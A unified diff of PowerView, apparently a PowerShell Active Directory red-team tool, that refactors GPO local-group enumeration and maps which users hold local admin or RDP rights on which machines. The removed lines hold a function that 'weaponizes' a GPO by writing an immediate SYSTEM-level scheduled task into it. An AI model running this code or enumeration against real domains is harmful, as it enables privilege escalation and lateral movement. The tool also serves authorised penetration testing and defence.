- [Parameter(ParameterSetName = 'Remove')] [Switch] - $Remove, + $Tombstone, - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - # build the XML spec for our 'immediate' scheduled task - $TaskXML = ''+$TaskAuthor+''+$TaskDescription+'NT AUTHORITY\SystemHighestAvailableS4UPT10MPT1HtruefalseIgnoreNewfalsetruefalsetruefalsetruetruePT0S7PT0SPT15M3'+$Command+''+$CommandArguments+'%LocalTimeXmlEx%%LocalTimeXmlEx%true' - - if (!$PSBoundParameters['GPOname'] -and !$PSBoundParameters['GPODisplayName']) { - Write-Warning 'Either -GPOName or -GPODisplayName must be specified' - return + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ConvertArguments = @{} + if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + + $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries } - # eunmerate the specified GPO(s) - $GPOs = Get-NetGPO -GPOname $GPOname -DisplayName $GPODisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -Credential $Credential - - if(!$GPOs) { - Write-Warning 'No GPO found.' - return - } + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainGPO @SearcherArguments | ForEach-Object { + $GPOdisplayName = $_.displayname + $GPOname = $_.name + $GPOPath = $_.gpcfilesyspath + + $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" } + if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } + + # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists + $Inf = Get-GptTmpl @ParseArgs + + if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) { + $Memberships = @{} + + # parse the members/memberof fields for each entry + ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) { + $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()} + # extract out ALL members + $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_} + + if ($PSBoundParameters['ResolveMembersToSIDs']) { + # if the resulting member is username and not a SID, attempt to resolve it + $GroupMembers = @() + ForEach ($Member in $MembershipValue) { + if ($Member -and ($Member.Trim() -ne '')) { + if ($Member -notmatch '^S-1-.*') { + $ConvertToArguments = @{'ObjectName' = $Member} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $MemberSID = ConvertTo-SID @ConvertToArguments + + if ($MemberSID) { + $GroupMembers += $MemberSID + } + else { + $GroupMembers += $Member + } + } + else { + $GroupMembers += $Member + } + } + } + $MembershipValue = $GroupMembers + } - $GPOs | ForEach-Object { - $ProcessedGPOName = $_.Name - try { - Write-Verbose "Trying to weaponize GPO: $ProcessedGPOName" + if (-not $Memberships[$Group]) { + $Memberships[$Group] = @{} + } + if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)} + $Memberships[$Group].Add($Relation, $MembershipValue) + } - # map a network drive as New-PSDrive/New-Item/etc. don't accept -Credential properly :( - if($Credential) { - Write-Verbose "Mapping '$($_.gpcfilesyspath)' to network drive N:\" - $Path = $_.gpcfilesyspath.TrimEnd('\') - $Net = New-Object -ComObject WScript.Network - $Net.MapNetworkDrive("N:", $Path, $False, $Credential.UserName, $Credential.GetNetworkCredential().Password) - $TaskPath = "N:\Machine\Preferences\ScheduledTasks\" - } - else { - $TaskPath = $_.gpcfilesyspath + "\Machine\Preferences\ScheduledTasks\" - } + ForEach ($Membership in $Memberships.GetEnumerator()) { + if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) { + # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name + $GroupSID = $Membership.Key.Trim('*') + if ($GroupSID -and ($GroupSID.Trim() -ne '')) { + $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments + } + else { + $GroupName = $False + } + } + else { + $GroupName = $Membership.Key - if($Remove) { - if(!(Test-Path "$TaskPath\ScheduledTasks.xml")) { - Throw "Scheduled task doesn't exist at $TaskPath\ScheduledTasks.xml" - } + if ($GroupName -and ($GroupName.Trim() -ne '')) { + if ($Groupname -match 'Administrators') { + $GroupSID = 'S-1-5-32-544' + } + elseif ($Groupname -match 'Remote Desktop') { + $GroupSID = 'S-1-5-32-555' + } + elseif ($Groupname -match 'Guests') { + $GroupSID = 'S-1-5-32-546' + } + elseif ($GroupName.Trim() -ne '') { + $ConvertToArguments = @{'ObjectName' = $Groupname} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $GroupSID = ConvertTo-SID @ConvertToArguments + } + else { + $GroupSID = $Null + } + } + } - if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Removing schtask at $TaskPath\ScheduledTasks.xml")) { - return + $GPOGroup = New-Object PSObject + $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName + $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName + $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups' + $GPOGroup | Add-Member Noteproperty 'Filters' $Null + $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName + $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID + $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof + $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members + $GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') + $GPOGroup } + } - Remove-Item -Path "$TaskPath\ScheduledTasks.xml" -Force + # now try to the parse group policy preferences file (Groups.xml) if it exists + $ParseArgs = @{ + 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml" } - else { - if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Creating schtask at $TaskPath\ScheduledTasks.xml")) { - return - } - - # create the folder if it doesn't exist - $Null = New-Item -ItemType Directory -Force -Path $TaskPath - if(Test-Path "$TaskPath\ScheduledTasks.xml") { - Throw "Scheduled task already exists at $TaskPath\ScheduledTasks.xml !" + Get-GroupsXML @ParseArgs | ForEach-Object { + if ($PSBoundParameters['ResolveMembersToSIDs']) { + $GroupMembers = @() + ForEach ($Member in $_.GroupMembers) { + if ($Member -and ($Member.Trim() -ne '')) { + if ($Member -notmatch '^S-1-.*') { + + # if the resulting member is username and not a SID, attempt to resolve it + $ConvertToArguments = @{'ObjectName' = $Groupname} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member + + if ($MemberSID) { + $GroupMembers += $MemberSID + } + else { + $GroupMembers += $Member + } + } + else { + $GroupMembers += $Member + } + } + } + $_.GroupMembers = $GroupMembers } - $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTasks.xml" - } - - if($Credential) { - Write-Verbose "Removing mounted drive at N:\" - $Net = New-Object -ComObject WScript.Network - $Net.RemoveNetworkDrive("N:") - } - } - catch { - Write-Warning "Error for GPO $ProcessedGPOName : $_" - if($Credential) { - Write-Verbose "Removing mounted drive at N:\" - $Net = New-Object -ComObject WScript.Network - $Net.RemoveNetworkDrive("N:") + $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName + $_ | Add-Member Noteproperty 'GPOName' $GPOName + $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences' + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') + $_ } } } } -function Get-NetGPOGroup { +function Get-DomainGPOUserLocalGroupMapping { <# - .SYNOPSIS +.SYNOPSIS - Returns all GPOs in a domain that set "Restricted Groups" or use groups.xml on on target machines. +Enumerates the machines where a specific domain user/group is a member of a specific +local group, all through GPO correlation. If no user/group is specified, all +discoverable mappings are returned. - Author: @harmj0y - License: BSD 3-Clause - Required Dependencies: Get-NetGPO, Get-GptTmpl, Get-GroupsXML, Convert-NameToSid, Convert-SidToName - Optional Dependencies: None - - .DESCRIPTION +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup + +.DESCRIPTION - First enumerates all GPOs in the current/target domain using Get-NetGPO with passed - arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or - group membership is set through Group Policy Preferences groups.xml files. For any - GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' - section data is processed if present. Any found Groups.xml files are parsed with - Get-GroupsXML and those memberships are returned as well. +Takes a user/group name and optional domain, and determines the computers in the domain +the user/group has local admin (or RDP) rights to. - .PARAMETER GPOname +It does this by: + 1. resolving the user/group to its proper SID + 2. enumerating all groups the user/group is a current part of + and extracting all target SIDs to build a target SID list + 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling + Get-DomainGPOLocalGroup + 4. matching the target SID list to the queried GPO SID list + to enumerate all GPO the user is effectively applied with + 5. enumerating all OUs and sites and applicable GPO GUIs are + applied to through gplink enumerating + 6. querying for all computers under the given OUs or sites - The GPO name (GUID) to query for, wildcards accepted. +If no user/group is specified, all user/group -> machine mappings discovered through +GPO relationships are returned. - .PARAMETER DisplayName +.PARAMETER Identity - The GPO display name to query for, wildcards accepted. +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the user/group to identity GPO local group mappings for. - .PARAMETER Domain +.PARAMETER LocalGroup - The domain to query for GPOs, defaults to the current domain. +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. Defaults to local 'Administrators'. - .PARAMETER DomainController +.PARAMETER Domain - Domain controller to reflect LDAP queries through. +Specifies the domain to enumerate GPOs for, defaults to the current domain. - .PARAMETER ADSpath +.PARAMETER Server - The LDAP source to search through for GPOs. - e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER ResolveMemberSIDs +.PARAMETER SearchScope - Switch. Try to resolve the SIDs of all found group members. +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER UsePSDrive +.PARAMETER ResultPageSize - Switch. Mount any found policy files with temporary PSDrives. +Specifies the PageSize to set for the LDAP searcher object. - .PARAMETER PageSize +.PARAMETER ServerTimeLimit - The PageSize to set for the LDAP searcher object. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .EXAMPLE +.PARAMETER Tombstone - PS C:\> Get-NetGPOGroup +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Returns all local groups set by GPO along with their members and memberof. +.PARAMETER Credential - .EXAMPLE +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - PS C:\> Get-NetGPOGroup -ResolveMemberSIDs +.EXAMPLE - Returns all local groups set by GPO along with their members and memberof, - and resolve any members to their domain SIDs. +Get-DomainGPOUserLocalGroupMapping - .EXAMPLE +Find all user/group -> machine relationships where the user/group is a member +of the local administrators group on target machines. - PS C:\> Get-NetGPOGroup -GPOName '{0847C615-6C4E-4D45-A064-6001040CC21C}' +.EXAMPLE - Return any GPO-set groups for the GPO with the given name/GUID. +Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local - .EXAMPLE +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. - PS C:\> Get-NetGPOGroup -DisplayName 'Desktops' +.EXAMPLE - Return any GPO-set groups for the GPO with the given display name. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOUserLocalGroupMapping -Credential $Cred - .LINK +.OUTPUTS - https://morgansimonsenblog.azurewebsites.net/tag/groups/ +PowerView.GPOLocalGroupMapping + +A custom PSObject containing any target identity information and what local +group memberships they're a part of through GPO correlation. + +.LINK + +http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/ #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GPOUserLocalGroupMapping')] [CmdletBinding()] - Param ( + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] [String] - $GPOname = '*', + $Identity, [String] - $DisplayName, + [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] + $LocalGroup = 'Administrators', + [ValidateNotNullOrEmpty()] [String] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $DomainController, + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $ADSpath, - - [Switch] - $ResolveMemberSIDs, + $Server, - [Switch] - $UsePSDrive, + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200 - ) + $ResultPageSize = 200, - $Option = [System.StringSplitOptions]::RemoveEmptyEntries + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - # get every GPO from the specified domain with restricted groups set - Get-NetGPO -GPOName $GPOname -DisplayName $DisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize | ForEach-Object { + [Switch] + $Tombstone, - $GPOdisplayName = $_.displayname - $GPOname = $_.name - $GPOPath = $_.gpcfilesyspath + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - $ParseArgs = @{ - 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" - 'UsePSDrive' = $UsePSDrive - } + BEGIN { + $CommonArguments = @{} + if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential } + } - # parse the GptTmpl.inf 'Restricted Groups' file if it exists - $Inf = Get-GptTmpl @ParseArgs + PROCESS { + $TargetSIDs = @() - if($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) { + if ($PSBoundParameters['Identity']) { + $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid + $TargetObjectSID = $TargetSIDs + if (-not $TargetSIDs) { + Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'" + } + } + else { + # no filtering/match all + $TargetSIDs = @('*') + } - $Memberships = @{} + if ($LocalGroup -match 'S-1-5') { + $TargetLocalSID = $LocalGroup + } + elseif ($LocalGroup -match 'Admin') { + $TargetLocalSID = 'S-1-5-32-544' + } + else { + # RDP + $TargetLocalSID = 'S-1-5-32-555' + } - # group the members/memberof fields for each entry - ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) { - $Group, $Relation = $Membership.Key.Split('__', $Option) | ForEach-Object {$_.Trim()} + if ($TargetSIDs[0] -ne '*') { + ForEach ($TargetSid in $TargetSids) { + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'" + $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid + } + } - # extract out ALL members - $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_} + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID" + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs" - if($ResolveMemberSIDs) { - # if the resulting member is username and not a SID, attempt to resolve it - $GroupMembers = @() - ForEach($Member in $MembershipValue) { - if($Member -and ($Member.Trim() -ne '')) { - if($Member -notmatch '^S-1-.*') { - $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID - if($MemberSID) { - $GroupMembers += $MemberSID - } - else { - $GroupMembers += $Member - } - } - else { - $GroupMembers += $Member - } - } + $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object { + $GPOgroup = $_ + # if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID + if ($GPOgroup.GroupSID -match $TargetLocalSID) { + $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object { + if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) { + $GPOgroup } - $MembershipValue = $GroupMembers } - - if(-not $Memberships[$Group]) { - $Memberships[$Group] = @{} + } + # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs + if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) { + if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) { + $GPOgroup } - if($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)} - $Memberships[$Group].Add($Relation, $MembershipValue) } + } | Sort-Object -Property GPOName -Unique - ForEach ($Membership in $Memberships.GetEnumerator()) { - if($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) { - # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name - $GroupSID = $Membership.Key.Trim('*') - if($GroupSID -and ($GroupSID.Trim() -ne '')) { - $GroupName = Convert-SidToName -SID $GroupSID - } - else { - $GroupName = $False - } + $GPOgroups | Where-Object {$_} | ForEach-Object { + $GPOname = $_.GPODisplayName + $GPOguid = $_.GPOName + $GPOPath = $_.GPOPath + $GPOType = $_.GPOType + if ($_.GroupMembers) { + $GPOMembers = $_.GroupMembers + } + else { + $GPOMembers = $_.GroupSID + } + + $Filters = $_.Filters + + if ($TargetSIDs[0] -eq '*') { + # if the * wildcard was used, set the targets to all GPO members so everything it output + $TargetObjectSIDs = $GPOMembers + } + else { + $TargetObjectSIDs = $TargetObjectSID + } + + # find any OUs that have this GPO linked through gpLink + Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object { + if ($Filters) { + $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname } else { - $GroupName = $Membership.Key + $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname + } - if($GroupName -and ($GroupName.Trim() -ne '')) { - if($Groupname -match 'Administrators') { - $GroupSID = 'S-1-5-32-544' - } - elseif($Groupname -match 'Remote Desktop') { - $GroupSID = 'S-1-5-32-555' - } - elseif($Groupname -match 'Guests') { - $GroupSID = 'S-1-5-32-546' - } - elseif($GroupName.Trim() -ne '') { - $GroupSID = Convert-NameToSid -Domain $Domain -ObjectName $Groupname | Select-Object -ExpandProperty SID - } - else { - $GroupSID = $Null - } + if ($OUComputers) { + if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)} + + ForEach ($TargetSid in $TargetObjectSIDs) { + $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid' + + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOLocalGroupMapping = New-Object PSObject + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid + $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain + $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType + $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers + $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping') + $GPOLocalGroupMapping } } - - $GPOGroup = New-Object PSObject - $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName - $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName - $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath - $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups' - $GPOGroup | Add-Member Noteproperty 'Filters' $Null - $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName - $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID - $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof - $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members - $GPOGroup } - } - $ParseArgs = @{ - 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml" - 'UsePSDrive' = $UsePSDrive - } + # find any sites that have this GPO linked through gpLink + Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object { + ForEach ($TargetSid in $TargetObjectSIDs) { + $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid' - Get-GroupsXML @ParseArgs | ForEach-Object { - if($ResolveMemberSIDs) { - $GroupMembers = @() - ForEach($Member in $_.GroupMembers) { - if($Member -and ($Member.Trim() -ne '')) { - if($Member -notmatch '^S-1-.*') { - # if the resulting member is username and not a SID, attempt to resolve it - $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID - if($MemberSID) { - $GroupMembers += $MemberSID - } - else { - $GroupMembers += $Member - } - } - else { - $GroupMembers += $Member - } - } + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOLocalGroupMapping = New-Object PSObject + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid + $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType + $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl + $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping') + $GPOLocalGroupMapping } - $_.GroupMembers = $GroupMembers } - - $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName - $_ | Add-Member Noteproperty 'GPOName' $GPOName - $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences' - $_ } } } -function Find-GPOLocation { +function Get-DomainGPOComputerLocalGroupMapping { <# - .SYNOPSIS - - Enumerates the machines where a specific user/group is a member of a specific - local group, all through GPO correlation. +.SYNOPSIS - Author: @harmj0y - License: BSD 3-Clause - Required Dependencies: Get-NetUser, Get-NetGroup, Get-NetGPOGroup, Get-NetOU, Get-NetComputer, Get-ADObject, Get-NetSite - Optional Dependencies: None +Takes a computer (or GPO) object and determines what users/groups are in the specified +local group for the machine through GPO correlation. - .DESCRIPTION +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup - Takes a user/group name and optional domain, and determines the computers in the domain - the user/group has local admin (or RDP) rights to. +.DESCRIPTION - It does this by: - 1. resolving the user/group to its proper SID - 2. enumerating all groups the user/group is a current part of - and extracting all target SIDs to build a target SID list - 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling - Get-NetGPOGroup - 4. matching the target SID list to the queried GPO SID list - to enumerate all GPO the user is effectively applied with - 5. enumerating all OUs and sites and applicable GPO GUIs are - applied to through gplink enumerating - 6. querying for all computers under the given OUs or sites - - If no user/group is specified, all user/group -> machine mappings discovered through - GPO relationships are returned. +This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups +are in the specified local group for a target machine through GPO correlation. - .PARAMETER UserName +If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to +determine the OU the computer is a part of. Then resolve the computer's site name with +Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to +enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For +each resulting GPO group, resolve the resulting user/group name to a full AD object and +return the results. This will return the domain objects that are members of the specified +-LocalGroup for the given computer. - A (single) user name name to query for access. +Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and +localgroup specifications. - .PARAMETER GroupName +.PARAMETER ComputerIdentity - A (single) group name name to query for access. +A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for. - .PARAMETER Domain +.PARAMETER OUIdentity - Optional domain the user exists in for querying, defaults to the current domain. +An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for. - .PARAMETER DomainController +.PARAMETER LocalGroup - Domain controller to reflect LDAP queries through. +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. Defaults to local 'Administrators'. - .PARAMETER LocalGroup +.PARAMETER Domain - The local group to check access against. - Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), - or a custom local SID. Defaults to local 'Administrators'. +Specifies the domain to enumerate GPOs for, defaults to the current domain. - .PARAMETER UsePSDrive +.PARAMETER Server - Switch. Mount any found policy files with temporary PSDrives. +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER PageSize +.PARAMETER SearchScope - The PageSize to set for the LDAP searcher object. +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - .EXAMPLE +.PARAMETER ResultPageSize - PS C:\> Find-GPOLocation +Specifies the PageSize to set for the LDAP searcher object. - Find all user/group -> machine relationships where the user/group is a member - of the local administrators group on target machines. +.PARAMETER ServerTimeLimit - .EXAMPLE +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - PS C:\> Find-GPOLocation -UserName dfm - - Find all computers that dfm user has local administrator rights to in - the current domain. +.PARAMETER Tombstone - .EXAMPLE +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - PS C:\> Find-GPOLocation -UserName dfm -Domain dev.testlab.local - - Find all computers that dfm user has local administrator rights to in - the dev.testlab.local domain. +.PARAMETER Credential - .EXAMPLE +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - PS C:\> Find-GPOLocation -UserName jason -LocalGroup RDP - - Find all computers that jason has local RDP access rights to in the domain. -#> +.EXAMPLE - [CmdletBinding()] - Param ( - [String] - $UserName, +Get-DomainGPOComputerLocalGroupMapping 